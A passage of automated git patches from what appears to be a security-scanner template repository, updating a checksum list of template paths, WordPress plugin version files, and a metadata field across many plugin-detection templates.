http/cves/2020/CVE-2020-11798.yaml
http/cves/2021/CVE-2021-46107.yaml
http/cves/2022/CVE-2022-22897.yaml
From 4d2c756aeef01d066bc820ef5534fe6caca474e3 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 1 Sep 2023 03:02:37 +0000
Subject: [PATCH 21/30] Auto Generated Templates Checksum [Fri Sep 1 03:02:37
UTC 2023] :robot:
---
templates-checksum.txt | 7 ++++---
1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 0c7a030339e..18fab056b90 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -1379,6 +1379,7 @@ http/cves/2019/CVE-2019-9978.yaml:29fa05916d940a02b2052750609450962d826369
http/cves/2020/CVE-2020-0618.yaml:fb8a86443513fb8dfb8bfd4ef48846be61fbd046
http/cves/2020/CVE-2020-10148.yaml:785c887c894285e141a8c3ec6d81dbf0ca321825
http/cves/2020/CVE-2020-10199.yaml:148ba582f0b0a858b2974d29715f40352211ead0
+http/cves/2020/CVE-2020-10220.yaml:d4198c17d90c22e291f9ffcf41aa5838efcb3b70
http/cves/2020/CVE-2020-10546.yaml:064a059d47a385fd83a9b1b62793b5891e9e5b07
http/cves/2020/CVE-2020-10547.yaml:58b39f2460d859c96b62ab0697151b9d6334808e
http/cves/2020/CVE-2020-10548.yaml:379ae6d4c78187bc1e20dcf6ec9fb27ede275db3
@@ -1413,7 +1414,7 @@ http/cves/2020/CVE-2020-13121.yaml:9dc7b16d238c0f459e1c859af2eee995a490a654
http/cves/2020/CVE-2020-13158.yaml:f62235f5a3b204038b3da15490ab9114643183b8
http/cves/2020/CVE-2020-13167.yaml:65c3c0a11291c74e4ccb4e0b79ed0957d0a8de7c
http/cves/2020/CVE-2020-13258.yaml:aa3db4375fb4584fac99169f08ac1cda299855f3
-http/cves/2020/CVE-2020-13379.yaml:9b132983130683cf205fb619c8f5253cecb56b23
+http/cves/2020/CVE-2020-13379.yaml:05f9450e2fd21df27c555b164451a4c25a308a68
http/cves/2020/CVE-2020-13405.yaml:364c8a655d463164f79a3da5c045565d4fa9ff57
http/cves/2020/CVE-2020-13483.yaml:34af617d306d7bf273b42a8056f5025cd910a442
http/cves/2020/CVE-2020-13700.yaml:1a7bc8e4b8c9e42c098330b55f7f2365e48c71ca
@@ -6578,7 +6579,7 @@ http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml:67
http/vulnerabilities/other/qihang-media-disclosure.yaml:dad6da0182625d9a95acdfec0df21b049c4daa8d
http/vulnerabilities/other/qihang-media-lfi.yaml:3b581630106e3bd04f75366c9076ee8f1b8e8832
http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml:2382325fe062c56d0e35cc5384647750325f58dd
-http/vulnerabilities/other/rconfig-file-upload.yaml:bb0dc040e78ff6d9e6208aae64bf290ece7641a4
+http/vulnerabilities/other/rconfig-file-upload.yaml:b69bd7f2506e74dc3031fd6c5c4bab47e3f7f7fe
http/vulnerabilities/other/reddittop-rss-xss.yaml:03df8cb7029692c3157660f0aca9c22ee86884a8
http/vulnerabilities/other/resin-cnnvd-200705-315.yaml:4d3d645b58f506e86281f8dd0b487c34b6f6bbb5
http/vulnerabilities/other/resin-inputfile-fileread.yaml:99d1e9dc54f4ee317305d67f01721d137ddbd9d5
@@ -7031,7 +7032,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:1fac060039113823ee275fbf0ce92a110e7f1c25
+templates-checksum.txt:9e5fcb0888ac506996f56dea550bba9ca15dc63d
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From d075b59bc6b25e684ed34f9932bbbfd100f835a5 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 1 Sep 2023 04:02:09 +0000
Subject: [PATCH 22/30] Auto WordPress Plugins Update [Fri Sep 1 04:02:09 UTC
2023] :robot:
---
helpers/wordpress/plugins/all-in-one-seo-pack.txt | 2 +-
helpers/wordpress/plugins/better-wp-security.txt | 2 +-
helpers/wordpress/plugins/broken-link-checker.txt | 2 +-
helpers/wordpress/plugins/cookie-law-info.txt | 2 +-
helpers/wordpress/plugins/loco-translate.txt | 2 +-
helpers/wordpress/plugins/maintenance.txt | 2 +-
helpers/wordpress/plugins/ml-slider.txt | 2 +-
helpers/wordpress/plugins/woocommerce-payments.txt | 2 +-
http/technologies/wordpress/plugins/ad-inserter.yaml | 1 -
http/technologies/wordpress/plugins/add-to-any.yaml | 1 -
http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 -
http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
http/technologies/wordpress/plugins/akismet.yaml | 1 -
.../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 -
http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 -
.../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
.../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 -
http/technologies/wordpress/plugins/amp.yaml | 1 -
http/technologies/wordpress/plugins/antispam-bee.yaml | 1 -
http/technologies/wordpress/plugins/astra-sites.yaml | 1 -
http/technologies/wordpress/plugins/astra-widgets.yaml | 1 -
http/technologies/wordpress/plugins/autoptimize.yaml | 1 -
http/technologies/wordpress/plugins/backwpup.yaml | 1 -
http/technologies/wordpress/plugins/better-search-replace.yaml | 1 -
http/technologies/wordpress/plugins/better-wp-security.yaml | 1 -
.../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 -
http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 -
http/technologies/wordpress/plugins/breeze.yaml | 1 -
http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 -
.../wordpress/plugins/child-theme-configurator.yaml | 1 -
http/technologies/wordpress/plugins/classic-editor.yaml | 1 -
http/technologies/wordpress/plugins/classic-widgets.yaml | 1 -
.../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 -
http/technologies/wordpress/plugins/cmb2.yaml | 1 -
http/technologies/wordpress/plugins/coblocks.yaml | 1 -
http/technologies/wordpress/plugins/code-snippets.yaml | 1 -
http/technologies/wordpress/plugins/coming-soon.yaml | 1 -
http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 -
.../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
http/technologies/wordpress/plugins/contact-form-7.yaml | 1 -
http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 -
http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 -
http/technologies/wordpress/plugins/cookie-notice.yaml | 1 -
http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 -
.../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 -
http/technologies/wordpress/plugins/custom-css-js.yaml | 1 -
http/technologies/wordpress/plugins/custom-fonts.yaml | 1 -
http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 -
http/technologies/wordpress/plugins/disable-comments.yaml | 1 -
http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 -
http/technologies/wordpress/plugins/duplicate-page.yaml | 1 -
http/technologies/wordpress/plugins/duplicate-post.yaml | 1 -
http/technologies/wordpress/plugins/duplicator.yaml | 1 -
.../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 -
http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 -
http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 -
http/technologies/wordpress/plugins/elementor.yaml | 1 -
http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 -
http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 -
http/technologies/wordpress/plugins/envato-elements.yaml | 1 -
.../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 -
http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 -
.../wordpress/plugins/facebook-for-woocommerce.yaml | 1 -
http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 -
.../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 -
http/technologies/wordpress/plugins/flamingo.yaml | 1 -
http/technologies/wordpress/plugins/fluentform.yaml | 1 -
http/technologies/wordpress/plugins/font-awesome.yaml | 1 -
.../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 -
http/technologies/wordpress/plugins/formidable.yaml | 1 -
http/technologies/wordpress/plugins/forminator.yaml | 1 -
http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 -
http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
.../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 -
.../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 -
.../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
http/technologies/wordpress/plugins/google-site-kit.yaml | 1 -
.../wordpress/plugins/google-sitemap-generator.yaml | 1 -
http/technologies/wordpress/plugins/gtranslate.yaml | 1 -
http/technologies/wordpress/plugins/gutenberg.yaml | 1 -
http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
.../wordpress/plugins/header-and-footer-scripts.yaml | 1 -
.../wordpress/plugins/header-footer-code-manager.yaml | 1 -
.../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
http/technologies/wordpress/plugins/header-footer.yaml | 1 -
http/technologies/wordpress/plugins/health-check.yaml | 1 -
http/technologies/wordpress/plugins/hello-dolly.yaml | 1 -
http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 -
http/technologies/wordpress/plugins/imagify.yaml | 1 -
http/technologies/wordpress/plugins/imsanity.yaml | 1 -
.../wordpress/plugins/insert-headers-and-footers.yaml | 1 -
http/technologies/wordpress/plugins/instagram-feed.yaml | 1 -
.../wordpress/plugins/intuitive-custom-post-order.yaml | 1 -
http/technologies/wordpress/plugins/iwp-client.yaml | 1 -
http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 -
http/technologies/wordpress/plugins/jetpack.yaml | 1 -
http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 -
http/technologies/wordpress/plugins/kirki.yaml | 1 -
http/technologies/wordpress/plugins/leadin.yaml | 1 -
.../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 -
http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 -
http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 -
http/technologies/wordpress/plugins/loco-translate.yaml | 1 -
http/technologies/wordpress/plugins/loginizer.yaml | 1 -
http/technologies/wordpress/plugins/loginpress.yaml | 1 -
.../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 -
http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 -
http/technologies/wordpress/plugins/mailpoet.yaml | 1 -
http/technologies/wordpress/plugins/maintenance.yaml | 1 -
http/technologies/wordpress/plugins/mainwp-child.yaml | 1 -
http/technologies/wordpress/plugins/malcare-security.yaml | 1 -
http/technologies/wordpress/plugins/megamenu.yaml | 1 -
http/technologies/wordpress/plugins/members.yaml | 1 -
http/technologies/wordpress/plugins/meta-box.yaml | 1 -
http/technologies/wordpress/plugins/ml-slider.yaml | 1 -
http/technologies/wordpress/plugins/newsletter.yaml | 1 -
.../wordpress/plugins/nextend-facebook-connect.yaml | 1 -
http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 -
http/technologies/wordpress/plugins/ninja-forms.yaml | 1 -
http/technologies/wordpress/plugins/ocean-extra.yaml | 1 -
.../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 -
http/technologies/wordpress/plugins/optinmonster.yaml | 1 -
http/technologies/wordpress/plugins/otter-blocks.yaml | 1 -
http/technologies/wordpress/plugins/password-protected.yaml | 1 -
http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 -
http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 -
http/technologies/wordpress/plugins/polylang.yaml | 1 -
http/technologies/wordpress/plugins/popup-builder.yaml | 1 -
http/technologies/wordpress/plugins/popup-maker.yaml | 1 -
http/technologies/wordpress/plugins/post-smtp.yaml | 1 -
http/technologies/wordpress/plugins/post-types-order.yaml | 1 -
.../wordpress/plugins/premium-addons-for-elementor.yaml | 1 -
http/technologies/wordpress/plugins/pretty-link.yaml | 1 -
http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 -
http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 -
http/technologies/wordpress/plugins/redirection.yaml | 1 -
http/technologies/wordpress/plugins/redux-framework.yaml | 1 -
http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 -
http/technologies/wordpress/plugins/safe-svg.yaml | 1 -
http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 -
http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 -
http/technologies/wordpress/plugins/sg-security.yaml | 1 -
http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 -
.../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 -
.../wordpress/plugins/simple-custom-post-order.yaml | 1 -
http/technologies/wordpress/plugins/siteguard.yaml | 1 -
http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 -
http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 -
http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 -
.../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 -
http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 -
http/technologies/wordpress/plugins/svg-support.yaml | 1 -
http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
http/technologies/wordpress/plugins/tablepress.yaml | 1 -
http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 -
http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 -
http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 -
http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 -
.../wordpress/plugins/translatepress-multilingual.yaml | 1 -
.../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 -
.../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
http/technologies/wordpress/plugins/updraftplus.yaml | 1 -
http/technologies/wordpress/plugins/use-any-font.yaml | 1 -
http/technologies/wordpress/plugins/user-role-editor.yaml | 1 -
.../wordpress/plugins/velvet-blues-update-urls.yaml | 1 -
http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 -
.../wordpress/plugins/webp-converter-for-media.yaml | 1 -
http/technologies/wordpress/plugins/webp-express.yaml | 1 -
.../wordpress/plugins/widget-importer-exporter.yaml | 1 -
.../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 -
.../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 -
http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
.../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 -
.../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 -
http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 -
.../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 -
.../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 -
http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 -
http/technologies/wordpress/plugins/woocommerce.yaml | 1 -
http/technologies/wordpress/plugins/wordfence.yaml | 1 -
http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 -
http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 -
http/technologies/wordpress/plugins/worker.yaml | 1 -
http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 -
http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 -
http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 -
http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 -
http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 -
http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 -
http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 -
http/technologies/wordpress/plugins/wp-optimize.yaml | 1 -
http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 -
http/technologies/wordpress/plugins/wp-reset.yaml | 1 -
.../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 -
http/technologies/wordpress/plugins/wp-rollback.yaml | 1 -
http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 -
http/technologies/wordpress/plugins/wp-smushit.yaml | 1 -
http/technologies/wordpress/plugins/wp-statistics.yaml | 1 -
http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 -
http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 -
http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 -
http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 -
http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 -
http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 -
http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 -
.../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 -
208 files changed, 8 insertions(+), 208 deletions(-)
diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt
index f15ec04e09e..3b5ab14de2a 100644
--- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt
+++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt
@@ -1 +1 @@
-4.4.4
\ No newline at end of file
+4.4.5.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/better-wp-security.txt b/helpers/wordpress/plugins/better-wp-security.txt
index 5f82703f924..1c61cc5bd96 100644
--- a/helpers/wordpress/plugins/better-wp-security.txt
+++ b/helpers/wordpress/plugins/better-wp-security.txt
@@ -1 +1 @@
-8.1.7
\ No newline at end of file
+8.1.8
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/broken-link-checker.txt b/helpers/wordpress/plugins/broken-link-checker.txt
index fae692e41d4..7e541aec69b 100644
--- a/helpers/wordpress/plugins/broken-link-checker.txt
+++ b/helpers/wordpress/plugins/broken-link-checker.txt
@@ -1 +1 @@
-2.2.1
\ No newline at end of file
+2.2.2
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/cookie-law-info.txt b/helpers/wordpress/plugins/cookie-law-info.txt
index 6ebad148881..711ee4f504a 100644
--- a/helpers/wordpress/plugins/cookie-law-info.txt
+++ b/helpers/wordpress/plugins/cookie-law-info.txt
@@ -1 +1 @@
-3.1.2
\ No newline at end of file
+3.1.3
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/loco-translate.txt b/helpers/wordpress/plugins/loco-translate.txt
index e46a05b1967..68167133b95 100644
--- a/helpers/wordpress/plugins/loco-translate.txt
+++ b/helpers/wordpress/plugins/loco-translate.txt
@@ -1 +1 @@
-2.6.4
\ No newline at end of file
+2.6.5
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/maintenance.txt b/helpers/wordpress/plugins/maintenance.txt
index 109b44a452d..497104f6201 100644
--- a/helpers/wordpress/plugins/maintenance.txt
+++ b/helpers/wordpress/plugins/maintenance.txt
@@ -1 +1 @@
-4.07
\ No newline at end of file
+4.08
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/ml-slider.txt b/helpers/wordpress/plugins/ml-slider.txt
index ebb8439a9bb..0dc31e89d8c 100644
--- a/helpers/wordpress/plugins/ml-slider.txt
+++ b/helpers/wordpress/plugins/ml-slider.txt
@@ -1 +1 @@
-3.36.0
\ No newline at end of file
+3.37.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt
index f9da12e1184..c0be8a7992a 100644
--- a/helpers/wordpress/plugins/woocommerce-payments.txt
+++ b/helpers/wordpress/plugins/woocommerce-payments.txt
@@ -1 +1 @@
-6.3.2
\ No newline at end of file
+6.4.0
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba10422..7cbd1855ae3 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ad-inserter/
metadata:
- max-request: 1
plugin_namespace: ad-inserter
wpscan: https://wpscan.com/plugin/ad-inserter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf31180..8d579ff23de 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/add-to-any/
metadata:
- max-request: 1
plugin_namespace: add-to-any
wpscan: https://wpscan.com/plugin/add-to-any
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec2..4a6d8b7bbe1 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/admin-menu-editor/
metadata:
- max-request: 1
plugin_namespace: admin-menu-editor
wpscan: https://wpscan.com/plugin/admin-menu-editor
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614cb..e4eb308d39c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/advanced-custom-fields/
metadata:
- max-request: 1
plugin_namespace: advanced-custom-fields
wpscan: https://wpscan.com/plugin/advanced-custom-fields
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index 06cfd4950b5..97f1d8c18f2 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/akismet/
metadata:
- max-request: 1
plugin_namespace: akismet
wpscan: https://wpscan.com/plugin/akismet
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd1..10f104f2c74 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-404-redirect-to-homepage/
metadata:
- max-request: 1
plugin_namespace: all-404-redirect-to-homepage
wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c6..8addc28dedd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-seo-pack/
metadata:
- max-request: 1
plugin_namespace: all-in-one-seo-pack
wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec1525559..2e579621acd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-migration/
metadata:
- max-request: 1
plugin_namespace: all-in-one-wp-migration
wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd8..41e297ffebb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
metadata:
- max-request: 1
plugin_namespace: all-in-one-wp-security-and-firewall
wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d0804..0dd8686ec34 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/amp/
metadata:
- max-request: 1
plugin_namespace: amp
wpscan: https://wpscan.com/plugin/amp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e4..359671f3bd9 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/antispam-bee/
metadata:
- max-request: 1
plugin_namespace: antispam-bee
wpscan: https://wpscan.com/plugin/antispam-bee
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd58..116e0c420ad 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/astra-sites/
metadata:
- max-request: 1
plugin_namespace: astra-sites
wpscan: https://wpscan.com/plugin/astra-sites
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f350..dc4703ef8d9 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/astra-widgets/
metadata:
- max-request: 1
plugin_namespace: astra-widgets
wpscan: https://wpscan.com/plugin/astra-widgets
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc4..1426ac3ef26 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/autoptimize/
metadata:
- max-request: 1
plugin_namespace: autoptimize
wpscan: https://wpscan.com/plugin/autoptimize
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acce..78d1651ff4c 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/backwpup/
metadata:
- max-request: 1
plugin_namespace: backwpup
wpscan: https://wpscan.com/plugin/backwpup
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d7381..f7219b373d0 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/better-search-replace/
metadata:
- max-request: 1
plugin_namespace: better-search-replace
wpscan: https://wpscan.com/plugin/better-search-replace
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c4850795..f688a68f72c 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/better-wp-security/
metadata:
- max-request: 1
plugin_namespace: better-wp-security
wpscan: https://wpscan.com/plugin/better-wp-security
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d787..00e95c42634 100644
